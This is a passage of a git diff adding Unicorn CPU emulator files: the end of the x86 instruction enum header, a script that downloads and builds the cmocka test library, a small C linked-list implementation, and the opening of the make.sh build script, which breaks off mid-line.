UC_X86_INS_SETNP, + UC_X86_INS_SETNS, + UC_X86_INS_SETO, + UC_X86_INS_SETP, + UC_X86_INS_SETS, + UC_X86_INS_SFENCE, + UC_X86_INS_SGDT, + UC_X86_INS_SHA1MSG1, + UC_X86_INS_SHA1MSG2, + UC_X86_INS_SHA1NEXTE, + UC_X86_INS_SHA1RNDS4, + UC_X86_INS_SHA256MSG1, + UC_X86_INS_SHA256MSG2, + UC_X86_INS_SHA256RNDS2, + UC_X86_INS_SHL, + UC_X86_INS_SHLD, + UC_X86_INS_SHLX, + UC_X86_INS_SHR, + UC_X86_INS_SHRD, + UC_X86_INS_SHRX, + UC_X86_INS_SHUFPD, + UC_X86_INS_SHUFPS, + UC_X86_INS_SIDT, + UC_X86_INS_FSIN, + UC_X86_INS_SKINIT, + UC_X86_INS_SLDT, + UC_X86_INS_SMSW, + UC_X86_INS_SQRTPD, + UC_X86_INS_SQRTPS, + UC_X86_INS_SQRTSD, + UC_X86_INS_SQRTSS, + UC_X86_INS_FSQRT, + UC_X86_INS_STAC, + UC_X86_INS_STC, + UC_X86_INS_STD, + UC_X86_INS_STGI, + UC_X86_INS_STI, + UC_X86_INS_STMXCSR, + UC_X86_INS_STOSB, + UC_X86_INS_STOSD, + UC_X86_INS_STOSQ, + UC_X86_INS_STOSW, + UC_X86_INS_STR, + UC_X86_INS_FST, + UC_X86_INS_FSTP, + UC_X86_INS_FSTPNCE, + UC_X86_INS_FXCH, + UC_X86_INS_SUBPD, + UC_X86_INS_SUBPS, + UC_X86_INS_FSUBR, + UC_X86_INS_FISUBR, + UC_X86_INS_FSUBRP, + UC_X86_INS_SUBSD, + UC_X86_INS_SUBSS, + UC_X86_INS_FSUB, + UC_X86_INS_FISUB, + UC_X86_INS_FSUBP, + UC_X86_INS_SWAPGS, + UC_X86_INS_SYSCALL, + UC_X86_INS_SYSENTER, + UC_X86_INS_SYSEXIT, + UC_X86_INS_SYSRET, + UC_X86_INS_T1MSKC, + UC_X86_INS_TEST, + UC_X86_INS_UD2, + UC_X86_INS_FTST, + UC_X86_INS_TZCNT, + UC_X86_INS_TZMSK, + UC_X86_INS_FUCOMPI, + UC_X86_INS_FUCOMI, + UC_X86_INS_FUCOMPP, + UC_X86_INS_FUCOMP, + UC_X86_INS_FUCOM, + UC_X86_INS_UD2B, + UC_X86_INS_UNPCKHPD, + UC_X86_INS_UNPCKHPS, + UC_X86_INS_UNPCKLPD, + UC_X86_INS_UNPCKLPS, + UC_X86_INS_VADDPD, + UC_X86_INS_VADDPS, + UC_X86_INS_VADDSD, + UC_X86_INS_VADDSS, + UC_X86_INS_VADDSUBPD, + UC_X86_INS_VADDSUBPS, + UC_X86_INS_VAESDECLAST, + UC_X86_INS_VAESDEC, + UC_X86_INS_VAESENCLAST, + UC_X86_INS_VAESENC, + UC_X86_INS_VAESIMC, + UC_X86_INS_VAESKEYGENASSIST, + UC_X86_INS_VALIGND, + UC_X86_INS_VALIGNQ, + UC_X86_INS_VANDNPD, + UC_X86_INS_VANDNPS, + UC_X86_INS_VANDPD, + 
UC_X86_INS_VANDPS, + UC_X86_INS_VBLENDMPD, + UC_X86_INS_VBLENDMPS, + UC_X86_INS_VBLENDPD, + UC_X86_INS_VBLENDPS, + UC_X86_INS_VBLENDVPD, + UC_X86_INS_VBLENDVPS, + UC_X86_INS_VBROADCASTF128, + UC_X86_INS_VBROADCASTI32X4, + UC_X86_INS_VBROADCASTI64X4, + UC_X86_INS_VBROADCASTSD, + UC_X86_INS_VBROADCASTSS, + UC_X86_INS_VCMPPD, + UC_X86_INS_VCMPPS, + UC_X86_INS_VCMPSD, + UC_X86_INS_VCMPSS, + UC_X86_INS_VCOMPRESSPD, + UC_X86_INS_VCOMPRESSPS, + UC_X86_INS_VCVTDQ2PD, + UC_X86_INS_VCVTDQ2PS, + UC_X86_INS_VCVTPD2DQX, + UC_X86_INS_VCVTPD2DQ, + UC_X86_INS_VCVTPD2PSX, + UC_X86_INS_VCVTPD2PS, + UC_X86_INS_VCVTPD2UDQ, + UC_X86_INS_VCVTPH2PS, + UC_X86_INS_VCVTPS2DQ, + UC_X86_INS_VCVTPS2PD, + UC_X86_INS_VCVTPS2PH, + UC_X86_INS_VCVTPS2UDQ, + UC_X86_INS_VCVTSD2SI, + UC_X86_INS_VCVTSD2USI, + UC_X86_INS_VCVTSS2SI, + UC_X86_INS_VCVTSS2USI, + UC_X86_INS_VCVTTPD2DQX, + UC_X86_INS_VCVTTPD2DQ, + UC_X86_INS_VCVTTPD2UDQ, + UC_X86_INS_VCVTTPS2DQ, + UC_X86_INS_VCVTTPS2UDQ, + UC_X86_INS_VCVTUDQ2PD, + UC_X86_INS_VCVTUDQ2PS, + UC_X86_INS_VDIVPD, + UC_X86_INS_VDIVPS, + UC_X86_INS_VDIVSD, + UC_X86_INS_VDIVSS, + UC_X86_INS_VDPPD, + UC_X86_INS_VDPPS, + UC_X86_INS_VERR, + UC_X86_INS_VERW, + UC_X86_INS_VEXP2PD, + UC_X86_INS_VEXP2PS, + UC_X86_INS_VEXPANDPD, + UC_X86_INS_VEXPANDPS, + UC_X86_INS_VEXTRACTF128, + UC_X86_INS_VEXTRACTF32X4, + UC_X86_INS_VEXTRACTF64X4, + UC_X86_INS_VEXTRACTI128, + UC_X86_INS_VEXTRACTI32X4, + UC_X86_INS_VEXTRACTI64X4, + UC_X86_INS_VEXTRACTPS, + UC_X86_INS_VFMADD132PD, + UC_X86_INS_VFMADD132PS, + UC_X86_INS_VFMADDPD, + UC_X86_INS_VFMADD213PD, + UC_X86_INS_VFMADD231PD, + UC_X86_INS_VFMADDPS, + UC_X86_INS_VFMADD213PS, + UC_X86_INS_VFMADD231PS, + UC_X86_INS_VFMADDSD, + UC_X86_INS_VFMADD213SD, + UC_X86_INS_VFMADD132SD, + UC_X86_INS_VFMADD231SD, + UC_X86_INS_VFMADDSS, + UC_X86_INS_VFMADD213SS, + UC_X86_INS_VFMADD132SS, + UC_X86_INS_VFMADD231SS, + UC_X86_INS_VFMADDSUB132PD, + UC_X86_INS_VFMADDSUB132PS, + UC_X86_INS_VFMADDSUBPD, + UC_X86_INS_VFMADDSUB213PD, + UC_X86_INS_VFMADDSUB231PD, 
+ UC_X86_INS_VFMADDSUBPS, + UC_X86_INS_VFMADDSUB213PS, + UC_X86_INS_VFMADDSUB231PS, + UC_X86_INS_VFMSUB132PD, + UC_X86_INS_VFMSUB132PS, + UC_X86_INS_VFMSUBADD132PD, + UC_X86_INS_VFMSUBADD132PS, + UC_X86_INS_VFMSUBADDPD, + UC_X86_INS_VFMSUBADD213PD, + UC_X86_INS_VFMSUBADD231PD, + UC_X86_INS_VFMSUBADDPS, + UC_X86_INS_VFMSUBADD213PS, + UC_X86_INS_VFMSUBADD231PS, + UC_X86_INS_VFMSUBPD, + UC_X86_INS_VFMSUB213PD, + UC_X86_INS_VFMSUB231PD, + UC_X86_INS_VFMSUBPS, + UC_X86_INS_VFMSUB213PS, + UC_X86_INS_VFMSUB231PS, + UC_X86_INS_VFMSUBSD, + UC_X86_INS_VFMSUB213SD, + UC_X86_INS_VFMSUB132SD, + UC_X86_INS_VFMSUB231SD, + UC_X86_INS_VFMSUBSS, + UC_X86_INS_VFMSUB213SS, + UC_X86_INS_VFMSUB132SS, + UC_X86_INS_VFMSUB231SS, + UC_X86_INS_VFNMADD132PD, + UC_X86_INS_VFNMADD132PS, + UC_X86_INS_VFNMADDPD, + UC_X86_INS_VFNMADD213PD, + UC_X86_INS_VFNMADD231PD, + UC_X86_INS_VFNMADDPS, + UC_X86_INS_VFNMADD213PS, + UC_X86_INS_VFNMADD231PS, + UC_X86_INS_VFNMADDSD, + UC_X86_INS_VFNMADD213SD, + UC_X86_INS_VFNMADD132SD, + UC_X86_INS_VFNMADD231SD, + UC_X86_INS_VFNMADDSS, + UC_X86_INS_VFNMADD213SS, + UC_X86_INS_VFNMADD132SS, + UC_X86_INS_VFNMADD231SS, + UC_X86_INS_VFNMSUB132PD, + UC_X86_INS_VFNMSUB132PS, + UC_X86_INS_VFNMSUBPD, + UC_X86_INS_VFNMSUB213PD, + UC_X86_INS_VFNMSUB231PD, + UC_X86_INS_VFNMSUBPS, + UC_X86_INS_VFNMSUB213PS, + UC_X86_INS_VFNMSUB231PS, + UC_X86_INS_VFNMSUBSD, + UC_X86_INS_VFNMSUB213SD, + UC_X86_INS_VFNMSUB132SD, + UC_X86_INS_VFNMSUB231SD, + UC_X86_INS_VFNMSUBSS, + UC_X86_INS_VFNMSUB213SS, + UC_X86_INS_VFNMSUB132SS, + UC_X86_INS_VFNMSUB231SS, + UC_X86_INS_VFRCZPD, + UC_X86_INS_VFRCZPS, + UC_X86_INS_VFRCZSD, + UC_X86_INS_VFRCZSS, + UC_X86_INS_VORPD, + UC_X86_INS_VORPS, + UC_X86_INS_VXORPD, + UC_X86_INS_VXORPS, + UC_X86_INS_VGATHERDPD, + UC_X86_INS_VGATHERDPS, + UC_X86_INS_VGATHERPF0DPD, + UC_X86_INS_VGATHERPF0DPS, + UC_X86_INS_VGATHERPF0QPD, + UC_X86_INS_VGATHERPF0QPS, + UC_X86_INS_VGATHERPF1DPD, + UC_X86_INS_VGATHERPF1DPS, + UC_X86_INS_VGATHERPF1QPD, + UC_X86_INS_VGATHERPF1QPS, + 
UC_X86_INS_VGATHERQPD, + UC_X86_INS_VGATHERQPS, + UC_X86_INS_VHADDPD, + UC_X86_INS_VHADDPS, + UC_X86_INS_VHSUBPD, + UC_X86_INS_VHSUBPS, + UC_X86_INS_VINSERTF128, + UC_X86_INS_VINSERTF32X4, + UC_X86_INS_VINSERTF32X8, + UC_X86_INS_VINSERTF64X2, + UC_X86_INS_VINSERTF64X4, + UC_X86_INS_VINSERTI128, + UC_X86_INS_VINSERTI32X4, + UC_X86_INS_VINSERTI32X8, + UC_X86_INS_VINSERTI64X2, + UC_X86_INS_VINSERTI64X4, + UC_X86_INS_VINSERTPS, + UC_X86_INS_VLDDQU, + UC_X86_INS_VLDMXCSR, + UC_X86_INS_VMASKMOVDQU, + UC_X86_INS_VMASKMOVPD, + UC_X86_INS_VMASKMOVPS, + UC_X86_INS_VMAXPD, + UC_X86_INS_VMAXPS, + UC_X86_INS_VMAXSD, + UC_X86_INS_VMAXSS, + UC_X86_INS_VMCALL, + UC_X86_INS_VMCLEAR, + UC_X86_INS_VMFUNC, + UC_X86_INS_VMINPD, + UC_X86_INS_VMINPS, + UC_X86_INS_VMINSD, + UC_X86_INS_VMINSS, + UC_X86_INS_VMLAUNCH, + UC_X86_INS_VMLOAD, + UC_X86_INS_VMMCALL, + UC_X86_INS_VMOVQ, + UC_X86_INS_VMOVDDUP, + UC_X86_INS_VMOVD, + UC_X86_INS_VMOVDQA32, + UC_X86_INS_VMOVDQA64, + UC_X86_INS_VMOVDQA, + UC_X86_INS_VMOVDQU16, + UC_X86_INS_VMOVDQU32, + UC_X86_INS_VMOVDQU64, + UC_X86_INS_VMOVDQU8, + UC_X86_INS_VMOVDQU, + UC_X86_INS_VMOVHLPS, + UC_X86_INS_VMOVHPD, + UC_X86_INS_VMOVHPS, + UC_X86_INS_VMOVLHPS, + UC_X86_INS_VMOVLPD, + UC_X86_INS_VMOVLPS, + UC_X86_INS_VMOVMSKPD, + UC_X86_INS_VMOVMSKPS, + UC_X86_INS_VMOVNTDQA, + UC_X86_INS_VMOVNTDQ, + UC_X86_INS_VMOVNTPD, + UC_X86_INS_VMOVNTPS, + UC_X86_INS_VMOVSD, + UC_X86_INS_VMOVSHDUP, + UC_X86_INS_VMOVSLDUP, + UC_X86_INS_VMOVSS, + UC_X86_INS_VMOVUPD, + UC_X86_INS_VMOVUPS, + UC_X86_INS_VMPSADBW, + UC_X86_INS_VMPTRLD, + UC_X86_INS_VMPTRST, + UC_X86_INS_VMREAD, + UC_X86_INS_VMRESUME, + UC_X86_INS_VMRUN, + UC_X86_INS_VMSAVE, + UC_X86_INS_VMULPD, + UC_X86_INS_VMULPS, + UC_X86_INS_VMULSD, + UC_X86_INS_VMULSS, + UC_X86_INS_VMWRITE, + UC_X86_INS_VMXOFF, + UC_X86_INS_VMXON, + UC_X86_INS_VPABSB, + UC_X86_INS_VPABSD, + UC_X86_INS_VPABSQ, + UC_X86_INS_VPABSW, + UC_X86_INS_VPACKSSDW, + UC_X86_INS_VPACKSSWB, + UC_X86_INS_VPACKUSDW, + UC_X86_INS_VPACKUSWB, + 
UC_X86_INS_VPADDB, + UC_X86_INS_VPADDD, + UC_X86_INS_VPADDQ, + UC_X86_INS_VPADDSB, + UC_X86_INS_VPADDSW, + UC_X86_INS_VPADDUSB, + UC_X86_INS_VPADDUSW, + UC_X86_INS_VPADDW, + UC_X86_INS_VPALIGNR, + UC_X86_INS_VPANDD, + UC_X86_INS_VPANDND, + UC_X86_INS_VPANDNQ, + UC_X86_INS_VPANDN, + UC_X86_INS_VPANDQ, + UC_X86_INS_VPAND, + UC_X86_INS_VPAVGB, + UC_X86_INS_VPAVGW, + UC_X86_INS_VPBLENDD, + UC_X86_INS_VPBLENDMB, + UC_X86_INS_VPBLENDMD, + UC_X86_INS_VPBLENDMQ, + UC_X86_INS_VPBLENDMW, + UC_X86_INS_VPBLENDVB, + UC_X86_INS_VPBLENDW, + UC_X86_INS_VPBROADCASTB, + UC_X86_INS_VPBROADCASTD, + UC_X86_INS_VPBROADCASTMB2Q, + UC_X86_INS_VPBROADCASTMW2D, + UC_X86_INS_VPBROADCASTQ, + UC_X86_INS_VPBROADCASTW, + UC_X86_INS_VPCLMULQDQ, + UC_X86_INS_VPCMOV, + UC_X86_INS_VPCMPB, + UC_X86_INS_VPCMPD, + UC_X86_INS_VPCMPEQB, + UC_X86_INS_VPCMPEQD, + UC_X86_INS_VPCMPEQQ, + UC_X86_INS_VPCMPEQW, + UC_X86_INS_VPCMPESTRI, + UC_X86_INS_VPCMPESTRM, + UC_X86_INS_VPCMPGTB, + UC_X86_INS_VPCMPGTD, + UC_X86_INS_VPCMPGTQ, + UC_X86_INS_VPCMPGTW, + UC_X86_INS_VPCMPISTRI, + UC_X86_INS_VPCMPISTRM, + UC_X86_INS_VPCMPQ, + UC_X86_INS_VPCMPUB, + UC_X86_INS_VPCMPUD, + UC_X86_INS_VPCMPUQ, + UC_X86_INS_VPCMPUW, + UC_X86_INS_VPCMPW, + UC_X86_INS_VPCOMB, + UC_X86_INS_VPCOMD, + UC_X86_INS_VPCOMPRESSD, + UC_X86_INS_VPCOMPRESSQ, + UC_X86_INS_VPCOMQ, + UC_X86_INS_VPCOMUB, + UC_X86_INS_VPCOMUD, + UC_X86_INS_VPCOMUQ, + UC_X86_INS_VPCOMUW, + UC_X86_INS_VPCOMW, + UC_X86_INS_VPCONFLICTD, + UC_X86_INS_VPCONFLICTQ, + UC_X86_INS_VPERM2F128, + UC_X86_INS_VPERM2I128, + UC_X86_INS_VPERMD, + UC_X86_INS_VPERMI2D, + UC_X86_INS_VPERMI2PD, + UC_X86_INS_VPERMI2PS, + UC_X86_INS_VPERMI2Q, + UC_X86_INS_VPERMIL2PD, + UC_X86_INS_VPERMIL2PS, + UC_X86_INS_VPERMILPD, + UC_X86_INS_VPERMILPS, + UC_X86_INS_VPERMPD, + UC_X86_INS_VPERMPS, + UC_X86_INS_VPERMQ, + UC_X86_INS_VPERMT2D, + UC_X86_INS_VPERMT2PD, + UC_X86_INS_VPERMT2PS, + UC_X86_INS_VPERMT2Q, + UC_X86_INS_VPEXPANDD, + UC_X86_INS_VPEXPANDQ, + UC_X86_INS_VPEXTRB, + UC_X86_INS_VPEXTRD, + 
UC_X86_INS_VPEXTRQ, + UC_X86_INS_VPEXTRW, + UC_X86_INS_VPGATHERDD, + UC_X86_INS_VPGATHERDQ, + UC_X86_INS_VPGATHERQD, + UC_X86_INS_VPGATHERQQ, + UC_X86_INS_VPHADDBD, + UC_X86_INS_VPHADDBQ, + UC_X86_INS_VPHADDBW, + UC_X86_INS_VPHADDDQ, + UC_X86_INS_VPHADDD, + UC_X86_INS_VPHADDSW, + UC_X86_INS_VPHADDUBD, + UC_X86_INS_VPHADDUBQ, + UC_X86_INS_VPHADDUBW, + UC_X86_INS_VPHADDUDQ, + UC_X86_INS_VPHADDUWD, + UC_X86_INS_VPHADDUWQ, + UC_X86_INS_VPHADDWD, + UC_X86_INS_VPHADDWQ, + UC_X86_INS_VPHADDW, + UC_X86_INS_VPHMINPOSUW, + UC_X86_INS_VPHSUBBW, + UC_X86_INS_VPHSUBDQ, + UC_X86_INS_VPHSUBD, + UC_X86_INS_VPHSUBSW, + UC_X86_INS_VPHSUBWD, + UC_X86_INS_VPHSUBW, + UC_X86_INS_VPINSRB, + UC_X86_INS_VPINSRD, + UC_X86_INS_VPINSRQ, + UC_X86_INS_VPINSRW, + UC_X86_INS_VPLZCNTD, + UC_X86_INS_VPLZCNTQ, + UC_X86_INS_VPMACSDD, + UC_X86_INS_VPMACSDQH, + UC_X86_INS_VPMACSDQL, + UC_X86_INS_VPMACSSDD, + UC_X86_INS_VPMACSSDQH, + UC_X86_INS_VPMACSSDQL, + UC_X86_INS_VPMACSSWD, + UC_X86_INS_VPMACSSWW, + UC_X86_INS_VPMACSWD, + UC_X86_INS_VPMACSWW, + UC_X86_INS_VPMADCSSWD, + UC_X86_INS_VPMADCSWD, + UC_X86_INS_VPMADDUBSW, + UC_X86_INS_VPMADDWD, + UC_X86_INS_VPMASKMOVD, + UC_X86_INS_VPMASKMOVQ, + UC_X86_INS_VPMAXSB, + UC_X86_INS_VPMAXSD, + UC_X86_INS_VPMAXSQ, + UC_X86_INS_VPMAXSW, + UC_X86_INS_VPMAXUB, + UC_X86_INS_VPMAXUD, + UC_X86_INS_VPMAXUQ, + UC_X86_INS_VPMAXUW, + UC_X86_INS_VPMINSB, + UC_X86_INS_VPMINSD, + UC_X86_INS_VPMINSQ, + UC_X86_INS_VPMINSW, + UC_X86_INS_VPMINUB, + UC_X86_INS_VPMINUD, + UC_X86_INS_VPMINUQ, + UC_X86_INS_VPMINUW, + UC_X86_INS_VPMOVDB, + UC_X86_INS_VPMOVDW, + UC_X86_INS_VPMOVM2B, + UC_X86_INS_VPMOVM2D, + UC_X86_INS_VPMOVM2Q, + UC_X86_INS_VPMOVM2W, + UC_X86_INS_VPMOVMSKB, + UC_X86_INS_VPMOVQB, + UC_X86_INS_VPMOVQD, + UC_X86_INS_VPMOVQW, + UC_X86_INS_VPMOVSDB, + UC_X86_INS_VPMOVSDW, + UC_X86_INS_VPMOVSQB, + UC_X86_INS_VPMOVSQD, + UC_X86_INS_VPMOVSQW, + UC_X86_INS_VPMOVSXBD, + UC_X86_INS_VPMOVSXBQ, + UC_X86_INS_VPMOVSXBW, + UC_X86_INS_VPMOVSXDQ, + UC_X86_INS_VPMOVSXWD, + 
UC_X86_INS_VPMOVSXWQ, + UC_X86_INS_VPMOVUSDB, + UC_X86_INS_VPMOVUSDW, + UC_X86_INS_VPMOVUSQB, + UC_X86_INS_VPMOVUSQD, + UC_X86_INS_VPMOVUSQW, + UC_X86_INS_VPMOVZXBD, + UC_X86_INS_VPMOVZXBQ, + UC_X86_INS_VPMOVZXBW, + UC_X86_INS_VPMOVZXDQ, + UC_X86_INS_VPMOVZXWD, + UC_X86_INS_VPMOVZXWQ, + UC_X86_INS_VPMULDQ, + UC_X86_INS_VPMULHRSW, + UC_X86_INS_VPMULHUW, + UC_X86_INS_VPMULHW, + UC_X86_INS_VPMULLD, + UC_X86_INS_VPMULLQ, + UC_X86_INS_VPMULLW, + UC_X86_INS_VPMULUDQ, + UC_X86_INS_VPORD, + UC_X86_INS_VPORQ, + UC_X86_INS_VPOR, + UC_X86_INS_VPPERM, + UC_X86_INS_VPROTB, + UC_X86_INS_VPROTD, + UC_X86_INS_VPROTQ, + UC_X86_INS_VPROTW, + UC_X86_INS_VPSADBW, + UC_X86_INS_VPSCATTERDD, + UC_X86_INS_VPSCATTERDQ, + UC_X86_INS_VPSCATTERQD, + UC_X86_INS_VPSCATTERQQ, + UC_X86_INS_VPSHAB, + UC_X86_INS_VPSHAD, + UC_X86_INS_VPSHAQ, + UC_X86_INS_VPSHAW, + UC_X86_INS_VPSHLB, + UC_X86_INS_VPSHLD, + UC_X86_INS_VPSHLQ, + UC_X86_INS_VPSHLW, + UC_X86_INS_VPSHUFB, + UC_X86_INS_VPSHUFD, + UC_X86_INS_VPSHUFHW, + UC_X86_INS_VPSHUFLW, + UC_X86_INS_VPSIGNB, + UC_X86_INS_VPSIGND, + UC_X86_INS_VPSIGNW, + UC_X86_INS_VPSLLDQ, + UC_X86_INS_VPSLLD, + UC_X86_INS_VPSLLQ, + UC_X86_INS_VPSLLVD, + UC_X86_INS_VPSLLVQ, + UC_X86_INS_VPSLLW, + UC_X86_INS_VPSRAD, + UC_X86_INS_VPSRAQ, + UC_X86_INS_VPSRAVD, + UC_X86_INS_VPSRAVQ, + UC_X86_INS_VPSRAW, + UC_X86_INS_VPSRLDQ, + UC_X86_INS_VPSRLD, + UC_X86_INS_VPSRLQ, + UC_X86_INS_VPSRLVD, + UC_X86_INS_VPSRLVQ, + UC_X86_INS_VPSRLW, + UC_X86_INS_VPSUBB, + UC_X86_INS_VPSUBD, + UC_X86_INS_VPSUBQ, + UC_X86_INS_VPSUBSB, + UC_X86_INS_VPSUBSW, + UC_X86_INS_VPSUBUSB, + UC_X86_INS_VPSUBUSW, + UC_X86_INS_VPSUBW, + UC_X86_INS_VPTESTMD, + UC_X86_INS_VPTESTMQ, + UC_X86_INS_VPTESTNMD, + UC_X86_INS_VPTESTNMQ, + UC_X86_INS_VPTEST, + UC_X86_INS_VPUNPCKHBW, + UC_X86_INS_VPUNPCKHDQ, + UC_X86_INS_VPUNPCKHQDQ, + UC_X86_INS_VPUNPCKHWD, + UC_X86_INS_VPUNPCKLBW, + UC_X86_INS_VPUNPCKLDQ, + UC_X86_INS_VPUNPCKLQDQ, + UC_X86_INS_VPUNPCKLWD, + UC_X86_INS_VPXORD, + UC_X86_INS_VPXORQ, + UC_X86_INS_VPXOR, + 
UC_X86_INS_VRCP14PD, + UC_X86_INS_VRCP14PS, + UC_X86_INS_VRCP14SD, + UC_X86_INS_VRCP14SS, + UC_X86_INS_VRCP28PD, + UC_X86_INS_VRCP28PS, + UC_X86_INS_VRCP28SD, + UC_X86_INS_VRCP28SS, + UC_X86_INS_VRCPPS, + UC_X86_INS_VRCPSS, + UC_X86_INS_VRNDSCALEPD, + UC_X86_INS_VRNDSCALEPS, + UC_X86_INS_VRNDSCALESD, + UC_X86_INS_VRNDSCALESS, + UC_X86_INS_VROUNDPD, + UC_X86_INS_VROUNDPS, + UC_X86_INS_VROUNDSD, + UC_X86_INS_VROUNDSS, + UC_X86_INS_VRSQRT14PD, + UC_X86_INS_VRSQRT14PS, + UC_X86_INS_VRSQRT14SD, + UC_X86_INS_VRSQRT14SS, + UC_X86_INS_VRSQRT28PD, + UC_X86_INS_VRSQRT28PS, + UC_X86_INS_VRSQRT28SD, + UC_X86_INS_VRSQRT28SS, + UC_X86_INS_VRSQRTPS, + UC_X86_INS_VRSQRTSS, + UC_X86_INS_VSCATTERDPD, + UC_X86_INS_VSCATTERDPS, + UC_X86_INS_VSCATTERPF0DPD, + UC_X86_INS_VSCATTERPF0DPS, + UC_X86_INS_VSCATTERPF0QPD, + UC_X86_INS_VSCATTERPF0QPS, + UC_X86_INS_VSCATTERPF1DPD, + UC_X86_INS_VSCATTERPF1DPS, + UC_X86_INS_VSCATTERPF1QPD, + UC_X86_INS_VSCATTERPF1QPS, + UC_X86_INS_VSCATTERQPD, + UC_X86_INS_VSCATTERQPS, + UC_X86_INS_VSHUFPD, + UC_X86_INS_VSHUFPS, + UC_X86_INS_VSQRTPD, + UC_X86_INS_VSQRTPS, + UC_X86_INS_VSQRTSD, + UC_X86_INS_VSQRTSS, + UC_X86_INS_VSTMXCSR, + UC_X86_INS_VSUBPD, + UC_X86_INS_VSUBPS, + UC_X86_INS_VSUBSD, + UC_X86_INS_VSUBSS, + UC_X86_INS_VTESTPD, + UC_X86_INS_VTESTPS, + UC_X86_INS_VUNPCKHPD, + UC_X86_INS_VUNPCKHPS, + UC_X86_INS_VUNPCKLPD, + UC_X86_INS_VUNPCKLPS, + UC_X86_INS_VZEROALL, + UC_X86_INS_VZEROUPPER, + UC_X86_INS_WAIT, + UC_X86_INS_WBINVD, + UC_X86_INS_WRFSBASE, + UC_X86_INS_WRGSBASE, + UC_X86_INS_WRMSR, + UC_X86_INS_XABORT, + UC_X86_INS_XACQUIRE, + UC_X86_INS_XBEGIN, + UC_X86_INS_XCHG, + UC_X86_INS_XCRYPTCBC, + UC_X86_INS_XCRYPTCFB, + UC_X86_INS_XCRYPTCTR, + UC_X86_INS_XCRYPTECB, + UC_X86_INS_XCRYPTOFB, + UC_X86_INS_XEND, + UC_X86_INS_XGETBV, + UC_X86_INS_XLATB, + UC_X86_INS_XRELEASE, + UC_X86_INS_XRSTOR, + UC_X86_INS_XRSTOR64, + UC_X86_INS_XRSTORS, + UC_X86_INS_XRSTORS64, + UC_X86_INS_XSAVE, + UC_X86_INS_XSAVE64, + UC_X86_INS_XSAVEC, + UC_X86_INS_XSAVEC64, + 
UC_X86_INS_XSAVEOPT, + UC_X86_INS_XSAVEOPT64, + UC_X86_INS_XSAVES, + UC_X86_INS_XSAVES64, + UC_X86_INS_XSETBV, + UC_X86_INS_XSHA1, + UC_X86_INS_XSHA256, + UC_X86_INS_XSTORE, + UC_X86_INS_XTEST, + UC_X86_INS_FDISI8087_NOP, + UC_X86_INS_FENI8087_NOP, + + UC_X86_INS_ENDING, // mark the end of the list of insn +} uc_x86_insn; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/install-cmocka-linux.sh b/ai_anti_malware/unicorn/unicorn-master/install-cmocka-linux.sh new file mode 100644 index 0000000..85b2a12 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/install-cmocka-linux.sh @@ -0,0 +1,12 @@ +#!/bin/sh -ex +mkdir -p cmocka +#wget https://cmocka.org/files/1.1/cmocka-1.1.0.tar.xz -O /tmp/cmocka-1.1.0.tar.xz +wget --no-check-certificate https://cmocka.org/files/1.1/cmocka-1.1.1.tar.xz -P /tmp/ +tar -xf /tmp/cmocka-1.1.1.tar.xz -C /tmp +cd cmocka && cmake -DUNIT_TESTING=On /tmp/cmocka-1.1.1 && make && make test +# cmake builds an so instead of a dll in mingw/msys +if [[ ! -z $MSYSTEM ]]; then +cp src/cmocka.so src/cmocka.dll +fi +# cmocka does not include headers in build +cp -R /tmp/cmocka-1.1.1/include/ . diff --git a/ai_anti_malware/unicorn/unicorn-master/list.c b/ai_anti_malware/unicorn/unicorn-master/list.c new file mode 100644 index 0000000..164efcb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/list.c @@ -0,0 +1,111 @@ +#include <stdlib.h> +#include "unicorn/platform.h" +#include "list.h" + +// simple linked list implementation + +struct list *list_new(void) +{ + return calloc(1, sizeof(struct list)); +} + +// removed linked list nodes but does not free their content +void list_clear(struct list *list) +{ + struct list_item *next, *cur = list->head; + while (cur != NULL) { + next = cur->next; + free(cur); + cur = next; + } + list->head = NULL; + list->tail = NULL; +} + +// insert a new item at the begin of the list. 
+// returns generated linked list node, or NULL on failure +void *list_insert(struct list *list, void *data) +{ + struct list_item *item = malloc(sizeof(struct list_item)); + if (item == NULL) { + return NULL; + } + + item->data = data; + item->next = list->head; + + if (list->tail == NULL) { + list->tail = item; + } + + list->head = item; + + return item; +} + +// append a new item at the end of the list. +// returns generated linked list node, or NULL on failure +void *list_append(struct list *list, void *data) +{ + struct list_item *item = malloc(sizeof(struct list_item)); + if (item == NULL) { + return NULL; + } + item->next = NULL; + item->data = data; + if (list->head == NULL) { + list->head = item; + } else { + list->tail->next = item; + } + list->tail = item; + return item; +} + +// returns true if entry was removed, false otherwise +bool list_remove(struct list *list, void *data) +{ + struct list_item *next, *cur, *prev = NULL; + // is list empty? + if (list->head == NULL) { + return false; + } + cur = list->head; + while (cur != NULL) { + next = cur->next; + if (cur->data == data) { + if (cur == list->head) { + list->head = next; + } else { + prev->next = next; + } + if (cur == list->tail) { + list->tail = prev; + } + free(cur); + return true; + } + prev = cur; + cur = next; + } + return false; +} + +// returns true if the data exists in the list +bool list_exists(struct list *list, void *data) +{ + struct list_item *next, *cur = NULL; + // is list empty? 
+ if (list->head == NULL) { + return false; + } + cur = list->head; + while (cur != NULL) { + next = cur->next; + if (cur->data == data) { + return true; + } + cur = next; + } + return false; +} \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/make.sh b/ai_anti_malware/unicorn/unicorn-master/make.sh new file mode 100644 index 0000000..3b876de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/make.sh @@ -0,0 +1,138 @@ +#!/bin/sh + +# Unicorn Engine +# By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 + +usage() { + cat 1>&2 <<EOF +make.sh - The build script for unicorn engine +USAGE: + $ ./make.sh [OPTIONS] +OPTIONS: + Build the project + asan Build for ASan + install Install the project + uninstall Uninstall the project + macos-universal Build universal binaries on macOS + macos-universal-no Build non-universal binaries that includes only 64-bit code on macOS + cross-win32 Cross-compile Windows 32-bit binary with MinGW + cross-win64 Cross-compile Windows 64-bit binary with MinGW + cross-android_arm Cross-compile for Android Arm + cross-android_arm64 Cross-compile for Android Arm64 + linux32 Cross-compile Unicorn on 64-bit Linux to target 32-bit binary + msvc_update_genfiles Generate files for MSVC projects +EOF +} + +MAKE_JOBS=$((MAKE_JOBS+0)) +[ ${MAKE_JOBS} -lt 1 ] && \ + MAKE_JOBS=4 + +# build for ASAN +asan() { + env UNICORN_DEBUG=yes 